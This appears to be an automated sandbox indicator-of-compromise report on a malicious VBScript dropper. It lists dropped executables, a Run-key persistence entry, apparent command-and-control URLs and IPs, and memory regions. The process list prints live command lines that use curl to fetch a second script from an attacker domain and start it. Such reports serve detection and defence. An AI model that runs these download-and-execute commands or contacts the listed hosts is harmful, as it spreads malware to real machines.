IOC Report
6724c67fe2634.vbs

loading gif

Files

File Path
Type
Category
Malicious
6724c67fe2634.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\Public\6724c67fe2636.vbs
ASCII text, with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Temp\hcx.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\_6724c67fe2573\7zxa.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\_6724c67fe2573\CSRPS.exe
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
dropped
malicious
C:\_6724c67fe2573\unrar.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\65ewe[1].zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Composite Document File V2 Document, Cannot read section info
dropped
C:\_6724c67fe2573\CSRPS.dll
data
dropped
C:\_6724c67fe2573\MPDK.bat
ASCII text, with CRLF line terminators
modified
C:\_6724c67fe2573\downloaded.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
\Device\ConDrv
ASCII text, with CR, LF line terminators
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6724c67fe2634.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6724c67fe2636.vbs https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbs
malicious
C:\Windows\System32\curl.exe
curl -k -o C:\Users\Public\6724c67fe2636.vbs https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbs
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724c67fe2636.vbs
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\6724c67fe2636.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724c67fe2636.vbs
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\6724c67fe2636.vbs"
malicious
C:\_6724c67fe2573\CSRPS.exe
"C:\_6724c67fe2573\CSRPS.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c ipconfig /flushdns
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
malicious
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 65 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://64.190.113.68/contador/index.php?nomepc=user-PC
64.190.113.68
malicious
http://64.190.113.68/65ewe.zip
64.190.113.68
malicious
http://www.ghisler.com/plugins.htm
unknown
http://www.scootersoftware.com. 
unknown
http://www.scootersoftware.com/checkupdates.php?product=bc3&minor=
unknown
http://www.pngui.com/%E8%B4%AD%E4%B9%B0ordersU
unknown
http://www.scootersoftware.com/upgrade0.dll#
unknown
https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbsocx
unknown
https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbsO
unknown
http://www.embarcadero.com/products/delphi
unknown
http://www.scootersoftware.com/bugRepMailer.php
unknown
http://worldtimeapi.org/api/ip
unknown
http://www.scootersoftware.com/upgradewj
unknown
https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbsWinsta0
unknown
http://www.totalcmd.net/directory/packer.html
unknown
http://www.indyproject.org/
unknown
http://www.scootersoftware.com/buynow?bld=%dS
unknown
http://64.190.113.68/contador/index.php?nomepc=
unknown
http://www.scootersoftware.com/upgrade
unknown
http://www.scootersoftware.com/
unknown
http://www.scootersoftware.com/buynow?bld=%d
unknown
http://70.34.247.142/UPLOADMAISL.phpU
unknown
http://www.scootersoftware.com/support.php
unknown
http://www.scootersoftware.com/download.phpS
unknown
http://www.scootersoftware.com/download.php
unknown
https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbso
unknown
https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbscurl
unknown
http://64.190.113.68/65ewe.zip9F
unknown
http://www.scootersoftware.com/v3formats
unknown
http://www.scootersoftware.com/upgradeite
unknown
http://worldtimeapi.org:80/api/ip
unknown
http://64.190.113.68/contador/index.php?nomepc=user-PC_Classes
unknown
http://www.secureblackbox.com
unknown
https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbs
192.64.117.206
There are 24 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bg.microsoft.map.fastly.net
199.232.214.172
analisardocumento.com
192.64.117.206
worldtimeapi.org
213.188.196.246

IPs

IP
Domain
Country
Malicious
64.190.113.68
unknown
United States
malicious
213.188.196.246
worldtimeapi.org
Italy
192.64.117.206
analisardocumento.com
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
HKEY_CURRENT_USER\SOFTWARE\Scooter Software\Beyond Compare 3
CacheID
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
CSRPS

Memdumps

Base Address
Regiontype
Protect
Malicious
269B13A4000
heap
page read and write
269AF8B0000
heap
page read and write
269AF8AE000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
E6D000
heap
page read and write
680000
heap
page read and write
2C6E000
unkown
page read and write
29E0000
heap
page read and write
AE80000
trusted library allocation
page read and write
269B1497000
heap
page read and write
2E54000
heap
page read and write
269AF8D4000
heap
page read and write
2FB0000
heap
page read and write
9343000
unkown
page readonly
269AF8A4000
heap
page read and write
2D16000
heap
page read and write
2AFD000
stack
page read and write
2B81000
heap
page read and write
1AD000
stack
page read and write
2C7C000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
A0E5000
direct allocation
page read and write
3330000
heap
page read and write
AEF0000
direct allocation
page execute and read and write
E78000
heap
page read and write
2B50000
heap
page read and write
1310A000
heap
page read and write
269B1362000
heap
page read and write
2B20000
heap
page read and write
269AF8D5000
heap
page read and write
269B0DB6000
heap
page read and write
269AED42000
heap
page read and write
2B81000
heap
page read and write
1F5A49E5000
heap
page read and write
ACB000
unkown
page read and write
EA9000
heap
page read and write
130FE000
heap
page read and write
A3CD000
direct allocation
page read and write
269A9670000
heap
page read and write
B22E000
stack
page read and write
2D63000
heap
page read and write
2C7E000
stack
page read and write
B434000
direct allocation
page read and write
2FCC000
heap
page read and write
269B10CF000
heap
page read and write
2D23000
heap
page read and write
2DE3000
heap
page read and write
2B81000
heap
page read and write
269A9670000
heap
page read and write
269AFD20000
heap
page read and write
269B0206000
heap
page read and write
93CA000
unkown
page readonly
ED3000
heap
page read and write
92A0000
unkown
page readonly
2B54000
heap
page read and write
510000
heap
page read and write
AD2000
unkown
page read and write
2B81000
heap
page read and write
D9E000
stack
page read and write
269AEE4A000
heap
page read and write
269B06AA000
heap
page read and write
678B000
unkown
page execute read
E6D000
heap
page read and write
A252000
direct allocation
page read and write
269AFA4A000
heap
page read and write
2CDC000
heap
page read and write
269A96D9000
heap
page read and write
D514000
heap
page read and write
E7A000
heap
page read and write
9002000
unkown
page read and write
29CE000
unkown
page read and write
AF9E000
direct allocation
page read and write
2CA2000
heap
page read and write
3120000
heap
page read and write
940C000
unkown
page readonly
23158982000
heap
page read and write
269AFA8C000
heap
page read and write
269B09D8000
heap
page read and write
269AF8D3000
heap
page read and write
269B0836000
heap
page read and write
308F000
unkown
page read and write
269B0C6C000
heap
page read and write
AFE7000
direct allocation
page read and write
2B81000
heap
page read and write
92A9000
unkown
page readonly
269B143D000
heap
page read and write
5F6000
heap
page read and write
2BB65E6D000
heap
page read and write
29FE000
direct allocation
page read and write
130C0000
heap
page read and write
B4CE000
direct allocation
page read and write
269B06EC000
heap
page read and write
8F1D000
unkown
page execute read
269AFB94000
heap
page read and write
2B81000
heap
page read and write
29DE000
direct allocation
page read and write
E79000
heap
page read and write
2B81000
heap
page read and write
2DC0000
heap
page read and write
B1B0000
trusted library allocation
page read and write
30DF000
stack
page read and write
5D0000
heap
page read and write
2B50000
heap
page read and write
2BB65E30000
remote allocation
page read and write
3110000
heap
page read and write
2E2C000
heap
page read and write
269AF8AD000
heap
page read and write
A500000
direct allocation
page read and write
269B0416000
heap
page read and write
2B81000
heap
page read and write
34B0000
heap
page read and write
2DE5000
heap
page read and write
3574000
heap
page read and write
2C2E000
unkown
page read and write
2DCB000
heap
page read and write
34B0000
heap
page read and write
2F04000
heap
page read and write
269A96D9000
heap
page read and write
2E00000
heap
page read and write
269A9656000
heap
page read and write
269AEF52000
heap
page read and write
269AF8C5000
heap
page read and write
93A7000
unkown
page readonly
A394000
direct allocation
page read and write
2A1C000
heap
page read and write
269AF66A000
heap
page read and write
A280000
direct allocation
page read and write
30CF000
stack
page read and write
E7E000
heap
page read and write
2B73000
heap
page read and write
269B143F000
heap
page read and write
2A41000
direct allocation
page read and write
E78000
heap
page read and write
269B1153000
heap
page read and write
269A9667000
heap
page read and write
2CA8000
heap
page read and write
901F000
unkown
page read and write
92F2000
unkown
page readonly
269B0392000
heap
page read and write
269AEE08000
heap
page read and write
92F6000
unkown
page readonly
A099000
direct allocation
page read and write
269B0F00000
heap
page read and write
269AFB52000
heap
page read and write
D4A7000
heap
page read and write
269AF520000
heap
page read and write
269AF208000
heap
page read and write
2CA3000
heap
page read and write
269AF8AD000
heap
page read and write
269A96D9000
heap
page read and write
354C000
heap
page read and write
2FF4000
heap
page read and write
B1B2000
trusted library allocation
page read and write
1F5A49B8000
heap
page read and write
E1D000
heap
page read and write
2A7B000
direct allocation
page read and write
B17E000
stack
page read and write
2B81000
heap
page read and write
B1C7000
trusted library allocation
page read and write
2B53000
heap
page read and write
2B81000
heap
page read and write
30B3000
heap
page read and write
269AFFB4000
heap
page read and write
2B81000
heap
page read and write
5B3000
heap
page read and write
A396000
direct allocation
page read and write
269AF24A000
heap
page read and write
C7102FE000
stack
page read and write
D4A2000
heap
page read and write
345F000
unkown
page read and write
2BB65E6D000
heap
page read and write
29BF000
unkown
page read and write
269AF8CC000
heap
page read and write
8F8C000
unkown
page read and write
E83000
heap
page read and write
5B3000
heap
page read and write
269AF8CF000
heap
page read and write
93C2000
unkown
page readonly
93BE000
unkown
page readonly
937F000
unkown
page readonly
269AF142000
heap
page read and write
2B81000
heap
page read and write
2A4F000
direct allocation
page read and write
2AC3000
direct allocation
page read and write
D40000
heap
page read and write
2315894A000
heap
page read and write
269B049A000
heap
page read and write
2315894A000
heap
page read and write
269AF5A4000
heap
page read and write
A0CF000
direct allocation
page read and write
269AF89B000
heap
page read and write
269A9664000
heap
page read and write
B4CE000
direct allocation
page read and write
269B10CE000
heap
page read and write
2D3C000
heap
page read and write
2BB65EE5000
heap
page read and write
2D04000
heap
page read and write
2C96000
heap
page read and write
269AF8C7000
heap
page read and write
A4DC000
direct allocation
page read and write
269B12DF000
heap
page read and write
2B81000
heap
page read and write
93B4000
unkown
page readonly
269B1443000
heap
page read and write
2E50000
heap
page read and write
92ED000
unkown
page readonly
A2B5000
direct allocation
page read and write
9387000
unkown
page readonly
D594000
heap
page read and write
938E000
unkown
page readonly
2B81000
heap
page read and write
269AF45A000
heap
page read and write
2C9E000
unkown
page read and write
5490000
unkown
page readonly
AEC000
unkown
page write copy
603000
heap
page read and write
269B108C000
heap
page read and write
2D09000
heap
page read and write
2C93000
heap
page read and write
60D000
stack
page read and write
269AF8A7000
heap
page read and write
A0B1000
direct allocation
page read and write
B1B0000
trusted library allocation
page read and write
269A9656000
heap
page read and write
3254000
heap
page read and write
2F09000
heap
page read and write
DEE000
heap
page read and write
2B81000
heap
page read and write
269AFEEE000
heap
page read and write
B0A000
unkown
page read and write
E6D000
heap
page read and write
6F850000
unkown
page readonly
2B81000
heap
page read and write
2B81000
heap
page read and write
74BD000
unkown
page execute read
269B1110000
heap
page read and write
2B81000
heap
page read and write
2F60000
heap
page read and write
269AF8BA000
heap
page read and write
269B0560000
heap
page read and write
6F882000
unkown
page readonly
2CA9000
heap
page read and write
6826000
unkown
page execute read
2B81000
heap
page read and write
269B05A2000
heap
page read and write
269AEE08000
heap
page read and write
2B40000
heap
page read and write
269AF8CA000
heap
page read and write
43D0000
direct allocation
page execute and read and write
3150000
heap
page read and write
269AFEAD000
heap
page read and write
1F5A49CD000
heap
page read and write
269B0350000
heap
page read and write
269AF8CA000
heap
page read and write
2BB65E95000
heap
page read and write
23158910000
heap
page read and write
269B0CF0000
heap
page read and write
2315890A000
heap
page read and write
3350000
heap
page read and write
D500000
heap
page read and write
269A97F1000
heap
page read and write
2B81000
heap
page read and write
269AF8C6000
heap
page read and write
269A9DF1000
heap
page read and write
2315892D000
heap
page read and write
269B1320000
heap
page read and write
77D000
stack
page read and write
B1B0000
trusted library allocation
page read and write
2B81000
heap
page read and write
30AE000
stack
page read and write
2BB65E63000
heap
page read and write
2A89000
direct allocation
page read and write
933D000
unkown
page readonly
2B81000
heap
page read and write
269AEB84000
heap
page read and write
269AF8A9000
heap
page read and write
2B81000
heap
page read and write
405000
unkown
page execute read
269B0770000
heap
page read and write
269B0039000
heap
page read and write
5491000
unkown
page execute read
A07C000
direct allocation
page read and write
2B81000
heap
page read and write
D29A000
trusted library allocation
page read and write
6B40000
unkown
page execute read
B03C000
direct allocation
page read and write
269A966B000
heap
page read and write
269AE391000
heap
page read and write
2315891B000
heap
page read and write
269B0BA6000
heap
page read and write
34A0000
heap
page read and write
2B81000
heap
page read and write
269B04DC000
heap
page read and write
89BC000
unkown
page execute read
269AF89E000
heap
page read and write
2D9F000
unkown
page read and write
2E53000
heap
page read and write
269B13E7000
heap
page read and write
3510000
heap
page read and write
B1B0000
trusted library allocation
page read and write
2B20000
heap
page read and write
A206000
direct allocation
page read and write
269AF418000
heap
page read and write
E70000
heap
page read and write
3320000
heap
page read and write
2BB65EE6000
heap
page read and write
269AF87A000
heap
page read and write
269A9614000
heap
page read and write
C70FEFA000
stack
page read and write
1CBF3AA000
stack
page read and write
269B08D1000
heap
page read and write
2FE0000
heap
page read and write
A12B000
direct allocation
page read and write
269AF8CF000
heap
page read and write
269AF8AF000
heap
page read and write
1F5A49D1000
heap
page read and write
2BB65EB3000
heap
page read and write
269AD991000
heap
page read and write
2A36000
heap
page read and write
269B0EBF000
heap
page read and write
269AF8A4000
heap
page read and write
2BB65E8A000
heap
page read and write
A04F000
stack
page read and write
2D8F000
stack
page read and write
A298000
direct allocation
page read and write
2B3C000
stack
page read and write
2B81000
heap
page read and write
269B0A1B000
heap
page read and write
2CA3000
heap
page read and write
2E6E000
unkown
page read and write
269A9664000
heap
page read and write
3573000
heap
page read and write
931B000
unkown
page readonly
93DB000
unkown
page readonly
269AFACE000
heap
page read and write
2B81000
heap
page read and write
2BB65E6E000
heap
page read and write
2FF3000
heap
page read and write
2BB65EA0000
heap
page read and write
A132000
direct allocation
page read and write
400000
unkown
page readonly
2FCD000
stack
page read and write
269A9660000
heap
page read and write
269AF8A6000
heap
page read and write
45D000
stack
page read and write
3253000
heap
page read and write
269B0C6C000
heap
page read and write
2B81000
heap
page read and write
2B54000
heap
page read and write
2A1B000
direct allocation
page read and write
3253000
heap
page read and write
5B3000
heap
page read and write
269AF4DE000
heap
page read and write
D58F000
heap
page read and write
33CE000
stack
page read and write
AFB3000
direct allocation
page read and write
2ED0000
heap
page read and write
8F56000
unkown
page write copy
269A9EF0000
heap
page read and write
2BB65E30000
remote allocation
page read and write
A063000
direct allocation
page read and write
906D000
unkown
page write copy
2D30000
heap
page read and write
269AF8D4000
heap
page read and write
269A9BEF000
heap
page read and write
3200000
heap
page read and write
2D50000
heap
page read and write
269B104A000
heap
page read and write
D4B1000
heap
page read and write
269AFC9C000
heap
page read and write
269A9656000
heap
page read and write
269AEDC6000
heap
page read and write
2B20000
heap
page read and write
2E50000
heap
page read and write
322C000
heap
page read and write
2BB65E95000
heap
page read and write
269A9656000
heap
page read and write
422000
unkown
page execute read
2B81000
heap
page read and write
269AF8A0000
heap
page read and write
2B81000
heap
page read and write
269AF8A6000
heap
page read and write
269B108C000
heap
page read and write
269B028A000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
31BF000
unkown
page read and write
B1CA000
trusted library allocation
page read and write
269AF8D5000
heap
page read and write
269AF3D6000
heap
page read and write
269AFD62000
heap
page read and write
1F5A4A08000
heap
page read and write
6049000
unkown
page execute read
269A9664000
heap
page read and write
E7A000
heap
page read and write
269AF8CA000
heap
page read and write
D9970FD000
stack
page read and write
2ABF000
stack
page read and write
2B2B000
heap
page read and write
2F80000
heap
page read and write
269B1008000
heap
page read and write
B1CA000
trusted library allocation
page read and write
269AF8AD000
heap
page read and write
2A22000
direct allocation
page read and write
3880000
heap
page read and write
D530000
heap
page read and write
2CCD000
stack
page read and write
D960000
remote allocation
page read and write
2FF3000
heap
page read and write
2B81000
heap
page read and write
29D0000
heap
page read and write
269B1194000
heap
page read and write
2CFC000
heap
page read and write
8E000
stack
page read and write
A2A7000
direct allocation
page read and write
A122000
direct allocation
page read and write
8F70000
unkown
page write copy
2B81000
heap
page read and write
EBF000
heap
page read and write
2D20000
heap
page read and write
2B81000
heap
page read and write
74E000
stack
page read and write
2FF4000
heap
page read and write
269AF5E6000
heap
page read and write
B28000
unkown
page write copy
93C6000
unkown
page readonly
269B0140000
heap
page read and write
2B90000
heap
page read and write
269B0E7C000
heap
page read and write
2F04000
heap
page read and write
269AF772000
heap
page read and write
43B0000
heap
page read and write
8F65000
unkown
page read and write
9034000
unkown
page read and write
269AF628000
heap
page read and write
3360000
heap
page read and write
2F03000
heap
page read and write
2E46000
heap
page read and write
269B06EC000
heap
page read and write
373F000
unkown
page read and write
2AA6000
direct allocation
page read and write
269B0AE0000
heap
page read and write
B62E000
stack
page read and write
269AF8BE000
heap
page read and write
269B07F4000
heap
page read and write
269AEB01000
heap
page read and write
269AF8BE000
heap
page read and write
93A9000
unkown
page readonly
269B00FE000
heap
page read and write
1CBF6FE000
stack
page read and write
269AFEEE000
heap
page read and write
9049000
unkown
page read and write
30C3000
heap
page read and write
E82000
heap
page read and write
B1D9000
trusted library allocation
page read and write
269AF8B2000
heap
page read and write
5B4000
heap
page read and write
269A9656000
heap
page read and write
23158989000
heap
page read and write
61F5000
unkown
page execute read
269AF3D6000
heap
page read and write
2DE0000
heap
page read and write
269AFB52000
heap
page read and write
308E000
unkown
page read and write
2E70000
heap
page read and write
1CBFAFE000
stack
page read and write
ACB000
unkown
page write copy
2BA0000
heap
page read and write
2D24000
heap
page read and write
9314000
unkown
page readonly
2B81000
heap
page read and write
3560000
heap
page read and write
3880000
heap
page read and write
269B0F84000
heap
page read and write
B52F000
stack
page read and write
93F9000
unkown
page readonly
9413000
unkown
page readonly
2D64000
heap
page read and write
A190000
direct allocation
page read and write
A050000
direct allocation
page read and write
A104000
direct allocation
page read and write
13112000
heap
page read and write
30C3000
heap
page read and write
2BB65ECC000
heap
page read and write
8F44000
unkown
page write copy
2D03000
heap
page read and write
3246000
heap
page read and write
8F7D000
unkown
page write copy
29CF000
direct allocation
page read and write
269B0560000
heap
page read and write
93EA000
unkown
page readonly
93EF000
unkown
page readonly
2D03000
heap
page read and write
3220000
heap
page read and write
E84000
heap
page read and write
3574000
heap
page read and write
2B46000
heap
page read and write
269AFBD6000
heap
page read and write
2B81000
heap
page read and write
269A9664000
heap
page read and write
2A43000
heap
page read and write
2D63000
heap
page read and write
928F000
unkown
page readonly
269AF898000
heap
page read and write
2B81000
heap
page read and write
2315A400000
heap
page read and write
2BB65E66000
heap
page read and write
269B0B22000
heap
page read and write
2A30000
heap
page read and write
2C3E000
unkown
page read and write
B1CA000
trusted library allocation
page read and write
269AF8B5000
heap
page read and write
6FD000
stack
page read and write
269B0DF8000
heap
page read and write
AB3000
unkown
page write copy
DE0000
heap
page read and write
E72000
heap
page read and write
92AD000
unkown
page readonly
3573000
heap
page read and write
2E54000
heap
page read and write
2D10000
heap
page read and write
FFDD0000
direct allocation
page read and write
269B13E6000
heap
page read and write
269B05E4000
heap
page read and write
269AEF52000
heap
page read and write
2A9F000
direct allocation
page read and write
2D56000
heap
page read and write
E0F000
heap
page read and write
269ACF91000
heap
page read and write
2B81000
heap
page read and write
92E3000
unkown
page readonly
269AF89B000
heap
page read and write
269B030E000
heap
page read and write
D51E000
heap
page read and write
269AF352000
heap
page read and write
C7106FE000
stack
page read and write
9061000
unkown
page write copy
23158990000
heap
page read and write
269B01C4000
heap
page read and write
2B81000
heap
page read and write
269B0E7C000
heap
page read and write
3370000
heap
page read and write
269AEFD6000
heap
page read and write
3200000
heap
page read and write
269AF8B3000
heap
page read and write
269AFEAC000
heap
page read and write
2B81000
heap
page read and write
E83000
heap
page read and write
1F5A4A09000
heap
page read and write
269AF28C000
heap
page read and write
34EE000
stack
page read and write
269AF5E6000
heap
page read and write
2B81000
heap
page read and write
5B3000
heap
page read and write
2B81000
heap
page read and write
269B143D000
heap
page read and write
2B81000
heap
page read and write
92DE000
unkown
page readonly
2B81000
heap
page read and write
32B0000
heap
page read and write
3880000
heap
page read and write
2B81000
heap
page read and write
29B0000
direct allocation
page read and write
120F000
stack
page read and write
30FD000
stack
page read and write
30C3000
heap
page read and write
93E4000
unkown
page readonly
269AEE4A000
heap
page read and write
93AF000
unkown
page readonly
269B0D74000
heap
page read and write
30BF000
stack
page read and write
3460000
heap
page read and write
269A9656000
heap
page read and write
3380000
heap
page read and write
2BB65E62000
heap
page read and write
9340000
unkown
page readonly
30BF000
stack
page read and write
269AFCDE000
heap
page read and write
2315892E000
heap
page read and write
9403000
unkown
page readonly
31FE000
stack
page read and write
5B4000
heap
page read and write
92B2000
unkown
page readonly
2B81000
heap
page read and write
92B8000
unkown
page readonly
D81C000
stack
page read and write
E63000
heap
page read and write
269B1218000
heap
page read and write
B232000
heap
page read and write
75AA000
unkown
page execute read
1CBF9FF000
stack
page read and write
269AF87A000
heap
page read and write
269AF66A000
heap
page read and write
269B07F4000
heap
page read and write
A4F2000
direct allocation
page read and write
2B81000
heap
page read and write
EB8000
heap
page read and write
6BE000
stack
page read and write
5480000
heap
page read and write
48A000
unkown
page execute read
3573000
heap
page read and write
29F7000
direct allocation
page read and write
6940000
unkown
page execute read
934E000
unkown
page readonly
8F68000
unkown
page write copy
28AD000
stack
page read and write
2D10000
heap
page read and write
A0A4000
direct allocation
page read and write
269AF8A7000
heap
page read and write
2B81000
heap
page read and write
B031000
direct allocation
page read and write
2C90000
heap
page read and write
